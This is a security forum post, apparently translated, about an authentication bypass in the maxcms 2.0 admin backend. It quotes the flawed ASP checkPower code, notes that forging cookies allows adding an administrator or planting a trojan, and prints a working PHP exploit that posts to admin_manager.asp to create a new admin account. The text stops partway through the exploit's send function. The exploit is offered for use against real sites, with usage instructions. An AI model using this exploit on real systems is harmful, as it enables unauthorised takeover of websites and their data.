The maxcms background has an automatic upgrade function. The ajax injection is fixed, but this vulnerability is not fixed yet. In the previous post, a student asked if the authentication could be bypassed. The answer is yes, but the premise is that you need to know the background directory address to review the vulnerability code SubcheckPowerdimloginValidate, rsObj: loginValidatemaxcms2.0err. clear.
The maxcms background has an automatic upgrade function. The ajax injection is fixed, but this vulnerability is not fixed yet.
I posted a post asking if I can bypass the authentication. The answer is yes, but the premise is that I need to know the background directory address.
Review the vulnerability code
- Sub checkPower
- dim loginValidate,rsObj : loginValidate = "maxcms2.0"
- err.clear
- on error resume next
- set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=\'"&rCookie("m_username")&"\'","execute")
- loginValidate = md5(getAgent&getIp&rsObj(0))
- if err then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》"
- if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die "《script》top.location.href=\'index.asp?action=login\';《script》"
- checkManagerLevel rsObj(1)
- set rsObj=nothing
- End Sub
Where
- Function rCookie(cookieName)
- rCookie = request.cookies(cookieName)
- End Function
The key is that the value of this variable is loginValidate = md5 (getAgent & getIp & rsObj (0 ))
You can easily bypass this authentication code through cookie forgery. Then you can add a new Administrator or modify the configuration file to insert a Trojan
Here I will post an exp for adding a new Administrator.
- php
- print_r(\'
- +---------------------------------------------------------------------------+
- maxcms2.0 creat new admin exploit
- by Flyh4t
- team:wolvez security team
- site:bbs.wolvez.org
- dork:salemax#qq.com
- +---------------------------------------------------------------------------+
- \');
-
- if ($argc < 3) {
- print_r(\'
- +---------------------------------------------------------------------------+
- Usage: php \'.$argv[0].\' host path
- host: target server (ip/hostname)
- path: path to maxcms
- Example:
- php \'.$argv[0].\' localhost /maxcms2/
- +---------------------------------------------------------------------------+
- \');
- exit;
- }
-
- error_reporting(7);
- ini_set(\'max_execution_time\', 0);
-
- $host = $argv[1];
- $path = $argv[2];
- $name = rand(1,10000);
- $cmd = \'m_username=flyh4t\'.$name.\'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0\';
-
- $resp = send($cmd);
- if (!eregi(\'alert\',$resp)) {echo"[~]bad luck,exploit failed";exit;}
-
- print_r(\'
- +-----------------------------------------------------
- [+]cool,exploit seccuss
- [+]you have add a new adminuser flyh4t\'.$name.\'/wolvez
- +--------------------------------------------------------
- \');
-
-
- function send($cmd)
- {
- global $host, $path;
- $message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1rn";
- $message .= "Accept: */*rn";
- $message .= "Referer: http://$host$pathrn"